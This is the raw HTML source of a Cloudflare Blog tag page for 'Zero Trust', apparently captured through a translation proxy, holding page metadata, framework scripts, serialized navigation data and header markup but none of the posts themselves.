CINXE.COM
Zero Trust
<!doctype html> <html lang="en-us" dir="ltr"> <head> <base href="https://blog.cloudflare.com/tag/zero-trust/"> <script async src="https://ot.www.cloudflare.com/public/vendor/onetrust/scripttemplates/otSDKStub.js" data-document-language="true" type="text/javascript" data-domain-script="b1e05d49-f072-4bae-9116-bdb78af15448"></script> <meta name="HandheldFriendly" content="True"> <meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="baidu-site-verification" content="KeThzeyMOr"> <meta name="baidu-site-verification" content="code-NIlrS7gNhx"> <meta charset="UTF-8"> <meta name="description" content="Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet."> <title>Zero Trust</title> <meta name="title" content="Zero Trust"> <meta name="msvalidate.01" content="CF295E1604697F9CAD18B5A232E871F6"> <meta class="swiftype" name="language" data-type="string" content="en"> <script src="/static/z/i.js" type="text/javascript" referrerpolicy="origin"></script> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon-32x32.png"> <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.png"> <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-32x32.png"> <link rel="mask-icon" href="/images/favicon-32x32.png" color="#f78100"> <link rel="stylesheet" href="/themes/ashes.min.css"> <link rel="sitemap" href="/sitemap.xml"> <meta name="msapplication-TileColor" content="#da532c"> <meta name="theme-color" content="#ffffff"> <link rel="canonical" href="https://blog.cloudflare.com/tag/zero-trust/"> <link rel="alternate" type="application/rss+xml" title="Cloudflare Zero Trust RSS Feed" href="/tag/zero-trust/rss"> <link rel="alternate" hreflang="en-us" href="https://blog.cloudflare.com/tag/zero-trust/"> <link rel="alternate" hreflang="de-de" href="https://blog.cloudflare.com/de-de/tag/zero-trust/"> <link rel="alternate" hreflang="es-es" href="https://blog.cloudflare.com/es-es/tag/zero-trust/"> <link rel="alternate" hreflang="fr-fr" href="https://blog.cloudflare.com/fr-fr/tag/zero-trust/"> <link rel="alternate" hreflang="it-it" href="https://blog.cloudflare.com/it-it/tag/zero-trust/"> <link rel="alternate" hreflang="ja-jp" href="https://blog.cloudflare.com/ja-jp/tag/zero-trust/"> <link rel="alternate" hreflang="ko-kr" href="https://blog.cloudflare.com/ko-kr/tag/zero-trust/"> <link rel="alternate" hreflang="zh-tw" href="https://blog.cloudflare.com/zh-tw/tag/zero-trust/"> <link rel="alternate" hreflang="zh-cn" href="https://blog.cloudflare.com/zh-cn/tag/zero-trust/"> <link rel="alternate" hreflang="pt-br" href="https://blog.cloudflare.com/pt-br/tag/zero-trust/"> <link rel="alternate" hreflang="ru-ru" href="https://blog.cloudflare.com/ru-ru/tag/zero-trust/"> <link rel="alternate" hreflang="id-id" href="https://blog.cloudflare.com/id-id/tag/zero-trust/"> <link rel="alternate" hreflang="th-th" href="https://blog.cloudflare.com/th-th/tag/zero-trust/"> <link rel="alternate" hreflang="pl-pl" href="https://blog.cloudflare.com/pl-pl/tag/zero-trust/"> <link rel="alternate" hreflang="sv-se" href="https://blog.cloudflare.com/sv-se/tag/zero-trust/"><!-- General Meta Tags --> <meta property="article:publisher" content="https://www.facebook.com/cloudflare"><!-- Facebook Meta Tags --> <meta property="og:site_name" content="The Cloudflare Blog"> <meta property="og:type" content="website"> <meta property="og:title" content="The Cloudflare Blog: Zero Trust"> <meta property="og:description" content="Collection of Cloudflare blog posts tagged 'Zero Trust'"> <meta property="og:url" content="https://blog.cloudflare.com/tag/zero-trust/"> <meta property="og:image:width" content="1200"> <meta property="og:image:height" content="628"><!-- Twitter/X Meta Tags --> <meta name="twitter:title" content="The Cloudflare Blog: Zero Trust"> <meta name="twitter:description" content="Collection of Cloudflare blog posts tagged 'Zero Trust'"> <meta name="twitter:url" content="https://blog.cloudflare.com/tag/zero-trust/"> <meta name="twitter:card" content="summary_large_image"> <meta name="twitter:site" content="@cloudflare"> <meta property="og:image"> <meta name="twitter:image"> <link rel="stylesheet" href="/_astro/index.Bpd2cWaZ.css"> <style>astro-island,astro-slot,astro-static-slot{display:contents}</style> <script>(()=>{var e=async t=>{await(await t())()};(self.Astro||(self.Astro={})).only=e;window.dispatchEvent(new Event("astro:only"));})();;(()=>{var A=Object.defineProperty;var g=(i,o,a)=>o in i?A(i,o,{enumerable:!0,configurable:!0,writable:!0,value:a}):i[o]=a;var d=(i,o,a)=>g(i,typeof o!="symbol"?o+"":o,a);{let i={0:t=>m(t),1:t=>a(t),2:t=>new RegExp(t),3:t=>new Date(t),4:t=>new Map(a(t)),5:t=>new Set(a(t)),6:t=>BigInt(t),7:t=>new URL(t),8:t=>new Uint8Array(t),9:t=>new Uint16Array(t),10:t=>new Uint32Array(t),11:t=>1/0*t},o=t=>{let[l,e]=t;return l in i?i[l](e):void 0},a=t=>t.map(o),m=t=>typeof t!="object"||t===null?t:Object.fromEntries(Object.entries(t).map(([l,e])=>[l,o(e)]));class y extends HTMLElement{constructor(){super(...arguments);d(this,"Component");d(this,"hydrator");d(this,"hydrate",async()=>{var b;if(!this.hydrator||!this.isConnected)return;let e=(b=this.parentElement)==null?void 0:b.closest("astro-island[ssr]");if(e){e.addEventListener("astro:hydrate",this.hydrate,{once:!0});return}let c=this.querySelectorAll("astro-slot"),n={},h=this.querySelectorAll("template[data-astro-template]");for(let r of h){let s=r.closest(this.tagName);s!=null&&s.isSameNode(this)&&(n[r.getAttribute("data-astro-template")||"default"]=r.innerHTML,r.remove())}for(let r of c){let s=r.closest(this.tagName);s!=null&&s.isSameNode(this)&&(n[r.getAttribute("name")||"default"]=r.innerHTML)}let p;try{p=this.hasAttribute("props")?m(JSON.parse(this.getAttribute("props"))):{}}catch(r){let s=this.getAttribute("component-url")||"<unknown>",v=this.getAttribute("component-export");throw v&&(s+=` (export ${v})`),console.error(`[hydrate] Error parsing props for component ${s}`,this.getAttribute("props"),r),r}let u;await this.hydrator(this)(this.Component,p,n,{client:this.getAttribute("client")}),this.removeAttribute("ssr"),this.dispatchEvent(new CustomEvent("astro:hydrate"))});d(this,"unmount",()=>{this.isConnected||this.dispatchEvent(new CustomEvent("astro:unmount"))})}disconnectedCallback(){document.removeEventListener("astro:after-swap",this.unmount),document.addEventListener("astro:after-swap",this.unmount,{once:!0})}connectedCallback(){if(!this.hasAttribute("await-children")||document.readyState==="interactive"||document.readyState==="complete")this.childrenConnectedCallback();else{let e=()=>{document.removeEventListener("DOMContentLoaded",e),c.disconnect(),this.childrenConnectedCallback()},c=new MutationObserver(()=>{var n;((n=this.lastChild)==null?void 0:n.nodeType)===Node.COMMENT_NODE&&this.lastChild.nodeValue==="astro:end"&&(this.lastChild.remove(),e())});c.observe(this,{childList:!0}),document.addEventListener("DOMContentLoaded",e)}}async childrenConnectedCallback(){let e=this.getAttribute("before-hydration-url");e&&await import(e),this.start()}async start(){let e=JSON.parse(this.getAttribute("opts")),c=this.getAttribute("client");if(Astro[c]===void 0){window.addEventListener(`astro:${c}`,()=>this.start(),{once:!0});return}try{await Astro[c](async()=>{let n=this.getAttribute("renderer-url"),[h,{default:p}]=await Promise.all([import(this.getAttribute("component-url")),n?import(n):()=>()=>{}]),u=this.getAttribute("component-export")||"default";if(!u.includes("."))this.Component=h[u];else{this.Component=h;for(let f of u.split("."))this.Component=this.Component[f]}return this.hydrator=p,this.hydrate},e,this)}catch(n){console.error(`[astro-island] Error hydrating ${this.getAttribute("component-url")}`,n)}}attributeChangedCallback(){this.hydrate()}}d(y,"observedAttributes",["props"]),customElements.get("astro-island")||customElements.define("astro-island",y)}})();</script> <meta http-equiv="X-Translated-By" content="Google"> <meta http-equiv="X-Translated-To" content="de"> <script type="text/javascript" src="https://www.gstatic.com/_/translate_http/_/js/k=translate_http.tr.en_GB.tKc6KWkFf-8.O/am=gAE/d=1/rs=AN8SPfrf36LIV3DkhtRBGWFnLWWzaykPyw/m=corsproxy" data-sourceurl="https://blog.cloudflare.com/tag/zero-trust/"></script> <link href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@20..48,100..700,0..1,-50..200" rel="stylesheet"> <script type="text/javascript" src="https://www.gstatic.com/_/translate_http/_/js/k=translate_http.tr.en_GB.tKc6KWkFf-8.O/am=gAE/d=1/exm=corsproxy/ed=1/rs=AN8SPfrf36LIV3DkhtRBGWFnLWWzaykPyw/m=phishing_protection" data-phishing-protection-enabled="false" data-forms-warning-enabled="true" data-source-url="https://blog.cloudflare.com/tag/zero-trust/"></script> <meta name="robots" content="none"> </head> <body> <script type="text/javascript" src="https://www.gstatic.com/_/translate_http/_/js/k=translate_http.tr.en_GB.tKc6KWkFf-8.O/am=gAE/d=1/exm=corsproxy,phishing_protection/ed=1/rs=AN8SPfrf36LIV3DkhtRBGWFnLWWzaykPyw/m=navigationui" data-environment="prod" data-proxy-url="https://blog-cloudflare-com.translate.goog" data-proxy-full-url="https://blog-cloudflare-com.translate.goog/tag/zero-trust/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" data-source-url="https://blog.cloudflare.com/tag/zero-trust/" data-source-language="pl" data-target-language="de" data-display-language="en-GB" data-detected-source-language="" data-is-source-untranslated="false" data-source-untranslated-url="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://blog.cloudflare.com/tag/zero-trust/&anno=2" data-client="tr"></script><astro-island uid="Z1zv6kH" component-url="/_astro/GoogleAnalytics.DSjxwi8U.js" component-export="GoogleAnalytics" renderer-url="/_astro/client.DLO1yDVm.js" props="{"title":[0,"Zero Trust"],"canonical":[0,"https://blog.cloudflare.com/tag/zero-trust"],"info":[0],"tagInfo":[0,{"id":[0,"J61Eszqn98amrYHq4IhTx"],"slug":[0,"zero-trust"],"url":[0,"https://blog.cloudflare.com/zero-trust"],"name":[0,"Zero Trust"],"visibility":[0,"public"],"feature_image":[0,""]}],"authorInfo":[0],"translatedPosts":[1,[]]}" ssr client="only" opts="{"name":"GoogleAnalytics","value":"react"}"></astro-island> <script>(()=>{var l=(n,t)=>{let i=async()=>{await(await n())()},e=typeof t.value=="object"?t.value:void 0,s={timeout:e==null?void 0:e.timeout};"requestIdleCallback"in window?window.requestIdleCallback(i,s):setTimeout(i,s.timeout||200)};(self.Astro||(self.Astro={})).idle=l;window.dispatchEvent(new Event("astro:idle"));})();</script><astro-island uid="I0za" prefix="r8" component-url="/_astro/Navigation.CSu6dGvY.js" component-export="Navigation" renderer-url="/_astro/client.DLO1yDVm.js" props="{"title":[0,"The Cloudflare Blog"],"logo":[0,"//images.ctfassets.net/zkvhlag99gkb/69RwBidpiEHCDZ9rFVVk7T/092507edbed698420b89658e5a6d5105/CF_logo_stacked_blktype.png"],"pagesStore":[0,{"page":[0,"Tag"],"slug":[0,"zero-trust"],"translationsAvailable":[1,[[0,"de-de"],[0,"es-es"],[0,"fr-fr"],[0,"it-it"],[0,"ja-jp"],[0,"ko-kr"],[0,"zh-tw"],[0,"zh-cn"],[0,"pt-br"],[0,"ru-ru"],[0,"id-id"],[0,"th-th"],[0,"pl-pl"],[0,"sv-se"]]],"navData":[1,[[0,{"metadata":[0,{"tags":[1,[]],"concepts":[1,[]]}],"sys":[0,{"space":[0,{"sys":[0,{"type":[0,"Link"],"linkType":[0,"Space"],"id":[0,"zkvhlag99gkb"]}]}],"id":[0,"6Mp7ouACN2rT3YjL1xaXJx"],"type":[0,"Entry"],"createdAt":[0,"2024-10-09T19:42:46.231Z"],"updatedAt":[0,"2025-02-17T17:03:20.612Z"],"environment":[0,{"sys":[0,{"id":[0,"master"],"type":[0,"Link"],"linkType":[0,"Environment"]}]}],"publishedVersion":[0,63],"revision":[0,22],"contentType":[0,{"sys":[0,{"type":[0,"Link"],"linkType":[0,"ContentType"],"id":[0,"blogTag"]}]}],"locale":[0,"en-US"]}],"fields":[0,{"entryTitle":[0,"Security"],"name":[0,"Security"],"slug":[0,"security"],"featured":[0,true]}]}],[0,{"metadata":[0,{"tags":[1,[]],"concepts":[1,[]]}],"sys":[0,{"space":[0,{"sys":[0,{"type":[0,"Link"],"linkType":[0,"Space"],"id":[0,"zkvhlag99gkb"]}]}],"id":[0,"5kZtWqjqa7aOUoZr8NFGwI"],"type":[0,"Entry"],"createdAt":[0,"2024-10-09T19:43:26.040Z"],"updatedAt":[0,"2025-02-11T11:03:11.949Z"],"environment":[0,{"sys":[0,{"id":[0,"master"],"type":[0,"Link"],"linkType":[0,"Environment"]}]}],"publishedVersion":[0,103],"revision":[0,32],"contentType":[0,{"sys":[0,{"type":[0,"Link"],"linkType":[0,"ContentType"],"id":[0,"blogTag"]}]}],"locale":[0,"en-US"]}],"fields":[0,{"entryTitle":[0,"Cloudflare Radar"],"name":[0,"Radar"],"slug":[0,"cloudflare-radar"],"featured":[0,true]}]}],[0,{"metadata":[0,{"tags":[1,[]],"concepts":[1,[]]}],"sys":[0,{"space":[0,{"sys":[0,{"type":[0,"Link"],"linkType":[0,"Space"],"id":[0,"zkvhlag99gkb"]}]}],"id":[0,"6Foe3R8of95cWVnQwe5Toi"],"type":[0,"Entry"],"createdAt":[0,"2024-10-09T22:44:28.803Z"],"updatedAt":[0,"2025-02-10T05:02:55.192Z"],"environment":[0,{"sys":[0,{"id":[0,"master"],"type":[0,"Link"],"linkType":[0,"Environment"]}]}],"publishedVersion":[0,62],"revision":[0,23],"contentType":[0,{"sys":[0,{"type":[0,"Link"],"linkType":[0,"ContentType"],"id":[0,"blogTag"]}]}],"locale":[0,"en-US"]}],"fields":[0,{"entryTitle":[0,"AI"],"name":[0,"AI"],"slug":[0,"ai"],"featured":[0,true]}]}],[0,{"metadata":[0,{"tags":[1,[]],"concepts":[1,[]]}],"sys":[0,{"space":[0,{"sys":[0,{"type":[0,"Link"],"linkType":[0,"Space"],"id":[0,"zkvhlag99gkb"]}]}],"id":[0,"6QktrXeEFcl4e2dZUTZVGl"],"type":[0,"Entry"],"createdAt":[0,"2024-10-09T19:43:20.198Z"],"updatedAt":[0,"2025-02-04T17:23:05.518Z"],"environment":[0,{"sys":[0,{"id":[0,"master"],"type":[0,"Link"],"linkType":[0,"Environment"]}]}],"publishedVersion":[0,57],"revision":[0,24],"contentType":[0,{"sys":[0,{"type":[0,"Link"],"linkType":[0,"ContentType"],"id":[0,"blogTag"]}]}],"locale":[0,"en-US"]}],"fields":[0,{"entryTitle":[0,"Product News"],"name":[0,"Product News"],"slug":[0,"product-news"],"featured":[0,true]}]}],[0,{"metadata":[0,{"tags":[1,[]],"concepts":[1,[]]}],"sys":[0,{"space":[0,{"sys":[0,{"type":[0,"Link"],"linkType":[0,"Space"],"id":[0,"zkvhlag99gkb"]}]}],"id":[0,"J61Eszqn98amrYHq4IhTx"],"type":[0,"Entry"],"createdAt":[0,"2024-10-09T19:43:46.068Z"],"updatedAt":[0,"2025-02-04T17:20:13.333Z"],"environment":[0,{"sys":[0,{"id":[0,"master"],"type":[0,"Link"],"linkType":[0,"Environment"]}]}],"publishedVersion":[0,61],"revision":[0,27],"contentType":[0,{"sys":[0,{"type":[0,"Link"],"linkType":[0,"ContentType"],"id":[0,"blogTag"]}]}],"locale":[0,"en-US"]}],"fields":[0,{"entryTitle":[0,"Zero Trust"],"name":[0,"Zero Trust"],"slug":[0,"zero-trust"],"featured":[0,true]}]}],[0,{"metadata":[0,{"tags":[1,[]],"concepts":[1,[]]}],"sys":[0,{"space":[0,{"sys":[0,{"type":[0,"Link"],"linkType":[0,"Space"],"id":[0,"zkvhlag99gkb"]}]}],"id":[0,"4HIPcb68qM0e26fIxyfzwQ"],"type":[0,"Entry"],"createdAt":[0,"2024-10-09T19:43:21.536Z"],"updatedAt":[0,"2025-02-04T17:19:33.689Z"],"environment":[0,{"sys":[0,{"id":[0,"master"],"type":[0,"Link"],"linkType":[0,"Environment"]}]}],"publishedVersion":[0,59],"revision":[0,26],"contentType":[0,{"sys":[0,{"type":[0,"Link"],"linkType":[0,"ContentType"],"id":[0,"blogTag"]}]}],"locale":[0,"en-US"]}],"fields":[0,{"entryTitle":[0,"Developers"],"name":[0,"Developers"],"slug":[0,"developers"],"featured":[0,true]}]}],[0,{"metadata":[0,{"tags":[1,[]],"concepts":[1,[]]}],"sys":[0,{"space":[0,{"sys":[0,{"type":[0,"Link"],"linkType":[0,"Space"],"id":[0,"zkvhlag99gkb"]}]}],"id":[0,"48r7QV00gLMWOIcM1CSDRy"],"type":[0,"Entry"],"createdAt":[0,"2024-10-09T19:54:22.790Z"],"updatedAt":[0,"2025-02-04T17:17:33.067Z"],"environment":[0,{"sys":[0,{"id":[0,"master"],"type":[0,"Link"],"linkType":[0,"Environment"]}]}],"publishedVersion":[0,59],"revision":[0,26],"contentType":[0,{"sys":[0,{"type":[0,"Link"],"linkType":[0,"ContentType"],"id":[0,"blogTag"]}]}],"locale":[0,"en-US"]}],"fields":[0,{"entryTitle":[0,"Speed & Reliability"],"name":[0,"Speed & Reliability"],"slug":[0,"speed-and-reliability"],"featured":[0,true]}]}],[0,{"metadata":[0,{"tags":[1,[]],"concepts":[1,[]]}],"sys":[0,{"space":[0,{"sys":[0,{"type":[0,"Link"],"linkType":[0,"Space"],"id":[0,"zkvhlag99gkb"]}]}],"id":[0,"V86khSc459Yi1AhTlvtY7"],"type":[0,"Entry"],"createdAt":[0,"2024-10-09T19:46:53.657Z"],"updatedAt":[0,"2025-02-04T17:12:59.473Z"],"environment":[0,{"sys":[0,{"id":[0,"master"],"type":[0,"Link"],"linkType":[0,"Environment"]}]}],"publishedVersion":[0,57],"revision":[0,21],"contentType":[0,{"sys":[0,{"type":[0,"Link"],"linkType":[0,"ContentType"],"id":[0,"blogTag"]}]}],"locale":[0,"en-US"]}],"fields":[0,{"entryTitle":[0,"Partners"],"name":[0,"Partners"],"slug":[0,"partners"],"featured":[0,true]}]}],[0,{"metadata":[0,{"tags":[1,[]],"concepts":[1,[]]}],"sys":[0,{"space":[0,{"sys":[0,{"type":[0,"Link"],"linkType":[0,"Space"],"id":[0,"zkvhlag99gkb"]}]}],"id":[0,"4g8tPriKOAUwdUT4jNPebe"],"type":[0,"Entry"],"createdAt":[0,"2024-10-09T19:46:40.927Z"],"updatedAt":[0,"2025-02-04T17:11:28.566Z"],"environment":[0,{"sys":[0,{"id":[0,"master"],"type":[0,"Link"],"linkType":[0,"Environment"]}]}],"publishedVersion":[0,55],"revision":[0,24],"contentType":[0,{"sys":[0,{"type":[0,"Link"],"linkType":[0,"ContentType"],"id":[0,"blogTag"]}]}],"locale":[0,"en-US"]}],"fields":[0,{"entryTitle":[0,"Life at Cloudflare"],"name":[0,"Life at Cloudflare"],"slug":[0,"life-at-cloudflare"],"featured":[0,true]}]}],[0,{"metadata":[0,{"tags":[1,[]],"concepts":[1,[]]}],"sys":[0,{"space":[0,{"sys":[0,{"type":[0,"Link"],"linkType":[0,"Space"],"id":[0,"zkvhlag99gkb"]}]}],"id":[0,"16yk8DVbNNifxov5cWvAov"],"type":[0,"Entry"],"createdAt":[0,"2024-10-09T19:56:23.848Z"],"updatedAt":[0,"2025-01-29T05:03:35.958Z"],"environment":[0,{"sys":[0,{"id":[0,"master"],"type":[0,"Link"],"linkType":[0,"Environment"]}]}],"publishedVersion":[0,63],"revision":[0,28],"contentType":[0,{"sys":[0,{"type":[0,"Link"],"linkType":[0,"ContentType"],"id":[0,"blogTag"]}]}],"locale":[0,"en-US"]}],"fields":[0,{"entryTitle":[0,"Policy & Legal"],"name":[0,"Policy & Legal"],"slug":[0,"policy"],"featured":[0,true]}]}]]]}],"locale":[0,"en-us"],"translations":[0,{"posts.by":[0,"By"],"footer.gdpr":[0,"GDPR"],"lang_blurb1":[0,"This post is also available in {lang1}."],"lang_blurb2":[0,"This post is also available in {lang1} and {lang2}."],"lang_blurb3":[0,"This post is also available in {lang1}, {lang2} and {lang3}."],"footer.press":[0,"Press"],"header.title":[0,"The Cloudflare Blog"],"search.clear":[0,"Clear"],"search.filter":[0,"Filter"],"search.source":[0,"Source"],"footer.careers":[0,"Careers"],"footer.company":[0,"Company"],"footer.support":[0,"Support"],"footer.the_net":[0,"theNet"],"search.filters":[0,"Filters"],"footer.our_team":[0,"Our team"],"footer.webinars":[0,"Webinars"],"page.more_posts":[0,"More posts"],"posts.time_read":[0,"{time} min read"],"search.language":[0,"Language"],"footer.community":[0,"Community"],"footer.resources":[0,"Resources"],"footer.solutions":[0,"Solutions"],"footer.trademark":[0,"Trademark"],"header.subscribe":[0,"Subscribe"],"footer.compliance":[0,"Compliance"],"footer.free_plans":[0,"Free plans"],"footer.impact_ESG":[0,"Impact/ESG"],"posts.follow_on_X":[0,"Follow on X"],"footer.help_center":[0,"Help center"],"footer.network_map":[0,"Network Map"],"header.please_wait":[0,"Please Wait"],"page.related_posts":[0,"Related posts"],"search.result_stat":[0,"Results <strong>{search_range}</strong> of <strong>{search_total}</strong> for <strong>{search_keyword}</strong>"],"footer.case_studies":[0,"Case Studies"],"footer.connect_2024":[0,"Connect 2024"],"footer.terms_of_use":[0,"Terms of Use"],"footer.white_papers":[0,"White Papers"],"footer.cloudflare_tv":[0,"Cloudflare TV"],"footer.community_hub":[0,"Community Hub"],"footer.compare_plans":[0,"Compare plans"],"footer.contact_sales":[0,"Contact Sales"],"header.contact_sales":[0,"Contact Sales"],"header.email_address":[0,"Email Address"],"page.error.not_found":[0,"Page not found"],"footer.developer_docs":[0,"Developer docs"],"footer.privacy_policy":[0,"Privacy Policy"],"footer.request_a_demo":[0,"Request a demo"],"page.continue_reading":[0,"Continue reading"],"footer.analysts_report":[0,"Analyst reports"],"footer.for_enterprises":[0,"For enterprises"],"footer.getting_started":[0,"Getting Started"],"footer.learning_center":[0,"Learning Center"],"footer.project_galileo":[0,"Project Galileo"],"pagination.newer_posts":[0,"Newer Posts"],"pagination.older_posts":[0,"Older Posts"],"posts.social_buttons.x":[0,"Discuss on X"],"search.icon_aria_label":[0,"Search"],"search.source_location":[0,"Source/Location"],"footer.about_cloudflare":[0,"About Cloudflare"],"footer.athenian_project":[0,"Athenian Project"],"footer.become_a_partner":[0,"Become a partner"],"footer.cloudflare_radar":[0,"Cloudflare Radar"],"footer.network_services":[0,"Network services"],"footer.trust_and_safety":[0,"Trust & Safety"],"header.get_started_free":[0,"Get Started Free"],"page.search.placeholder":[0,"Search Cloudflare"],"footer.cloudflare_status":[0,"Cloudflare Status"],"footer.cookie_preference":[0,"Cookie Preferences"],"header.valid_email_error":[0,"Must be valid email."],"search.result_stat_empty":[0,"Results <strong>{search_range}</strong> of <strong>{search_total}</strong>"],"footer.connectivity_cloud":[0,"Connectivity cloud"],"footer.developer_services":[0,"Developer services"],"footer.investor_relations":[0,"Investor relations"],"page.not_found.error_code":[0,"Error Code: 404"],"search.autocomplete_title":[0,"Insert a query. Press enter to send"],"footer.logos_and_press_kit":[0,"Logos & press kit"],"footer.application_services":[0,"Application services"],"footer.get_a_recommendation":[0,"Get a recommendation"],"posts.social_buttons.reddit":[0,"Discuss on Reddit"],"footer.sse_and_sase_services":[0,"SSE and SASE services"],"page.not_found.outdated_link":[0,"You may have used an outdated link, or you may have typed the address incorrectly."],"footer.report_security_issues":[0,"Report Security Issues"],"page.error.error_message_page":[0,"Sorry, we can't find the page you are looking for."],"header.subscribe_notifications":[0,"Subscribe to receive notifications of new posts:"],"footer.cloudflare_for_campaigns":[0,"Cloudflare for Campaigns"],"header.subscription_confimation":[0,"Subscription confirmed. Thank you for subscribing!"],"posts.social_buttons.hackernews":[0,"Discuss on Hacker News"],"footer.diversity_equity_inclusion":[0,"Diversity, equity & inclusion"],"footer.critical_infrastructure_defense_project":[0,"Critical Infrastructure Defense Project"]}]}" ssr client="idle" opts="{"name":"NavigationComponent","value":true}" await-children> <header class="flex flex-row flex-wrap justify-between items-flex-end mw8 center mv3 pl3 pr1"> <div class="w-100 flex items-flex-end justify-between justify-start-l"> <div class="w-100 tr flex justify-end"> <div class="flex justify-between items-center"> <span class="dn di-l pr1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://dash.cloudflare.com/sign-up" class="f1 blue1 dn di-l b no-underline underline-hover" target="_blank" rel="noreferrer">Get Started Free</a></span><span class="f1 gray4 dn di-l pr1">|</span><span class="dn di-l"><a target="_blank" href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/plans/enterprise/contact/" class="f1 gray4 no-underline underline-hover pr1" rel="noreferrer">Contact Sales</a></span><span class="f1 gray4 dn di-l pr1">|</span> <div class="relative flex cf-dropdown"> <div class="flex items-center" dir="ltr"> <button type="button" class="f1 gray4 no-underline language-picker js-language-picker" style="background:transparent;border:none;padding:0"><span class="language-picker__globe-icon"></span><span class="language-picker__caret-icon ph1">▼</span></button> </div> </div> </div> </div> </div> <div class="w-100 w-50-l flex items-end nb5 nb1-l"> <a href="https://blog-cloudflare-com.translate.goog/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="header-logo mr4 dn db-l"><img class="header-logo" src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/69RwBidpiEHCDZ9rFVVk7T/092507edbed698420b89658e5a6d5105/CF_logo_stacked_blktype.png" alt="The Cloudflare Blog" width="170" height="57"></a> <h2 class="mt0 mb1 dn di-l"><a href="https://blog-cloudflare-com.translate.goog/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f5 gray3 no-underline"><span class="dn di-l">The Cloudflare Blog</span></a></h2> </div> <div class="w-100 w-50-l dn db-l"> <div class="w-100 tr mkto-sub-message"> <p class="f2">Subscribe to receive notifications of new posts:</p> </div> <div class="w-100 tr"> <div class="marketo-form-container"> <form id="mktoForm_1653"> <div class="top-subscribe-form-container"> <div class="top-subscribe-form-field"> <input placeholder="Email Address" class="top-subscribe-form-input" name="email" type="email" title="Must be valid email."> </div><button class="top-subscribe-form-button" type="button">Subscribe</button> </div> </form> </div> </div> </div> </header> <nav dir="ltr" class="bb b--black-10 db dn-l w-100 ph3 "> <div class=" flex justify-between items-center" style="height:44px"> <a href="https://blog-cloudflare-com.translate.goog/search/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB"><img class="h-6 w-6" src="/images/magnifier.svg" alt="magnifier icon"></a><button type="button" style="background:transparent;border:none"><img src="/images/hamburger.svg" alt="hamburger menu"></button> </div> <div class="js-mobile-nav-container dn"> <div class="flex flex-column flex-wrap bg-gray9 o-95 absolute w-90 ph3 z-1"> <div class="pv3 ph2 tl"> <a href="https://blog-cloudflare-com.translate.goog/tag/security/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 fw7">Security</a> </div> <div class="pv3 ph2 tl"> <a href="https://blog-cloudflare-com.translate.goog/tag/cloudflare-radar/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 fw7">Radar</a> </div> <div class="pv3 ph2 tl"> <a href="https://blog-cloudflare-com.translate.goog/tag/ai/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 fw7">AI</a> </div> <div class="pv3 ph2 tl"> <a href="https://blog-cloudflare-com.translate.goog/tag/product-news/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 fw7">Product News</a> </div> <div class="pv3 ph2 tl"> <a href="https://blog-cloudflare-com.translate.goog/tag/zero-trust/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 fw7">Zero Trust</a> </div> <div class="pv3 ph2 tl"> <a href="https://blog-cloudflare-com.translate.goog/tag/developers/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 fw7">Developers</a> </div> <div class="pv3 ph2 tl"> <a href="https://blog-cloudflare-com.translate.goog/tag/speed-and-reliability/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 fw7">Speed & Reliability</a> </div> <div class="pv3 ph2 tl"> <a href="https://blog-cloudflare-com.translate.goog/tag/partners/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 fw7">Partners</a> </div> <div class="pv3 ph2 tl"> <a href="https://blog-cloudflare-com.translate.goog/tag/life-at-cloudflare/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 fw7">Life at Cloudflare</a> </div> <div class="pv3 ph2 tl"> <a href="https://blog-cloudflare-com.translate.goog/tag/policy/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 fw7">Policy & Legal</a> </div> </div> </div> </nav> <nav id="nav" class="w-100 bb-0 bb-l b--black-10 z-1"> <div id="desktop-nav-items-container" class="flex flex-wrap justify-between items-center mw8 center mv3 mv0-l"> <div data-tag="security" class="nav-item nav-item-desktop ml3 mr2 dn db-l pv3"> <a href="https://blog-cloudflare-com.translate.goog/tag/security/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f2 fw5 pv3">Security</a> </div> <div data-tag="cloudflare-radar" class="nav-item nav-item-desktop ml3 mr2 dn db-l pv3"> <a href="https://blog-cloudflare-com.translate.goog/tag/cloudflare-radar/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f2 fw5 pv3">Radar</a> </div> <div data-tag="ai" class="nav-item nav-item-desktop ml3 mr2 dn db-l pv3"> <a href="https://blog-cloudflare-com.translate.goog/tag/ai/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f2 fw5 pv3">AI</a> </div> <div data-tag="product-news" class="nav-item 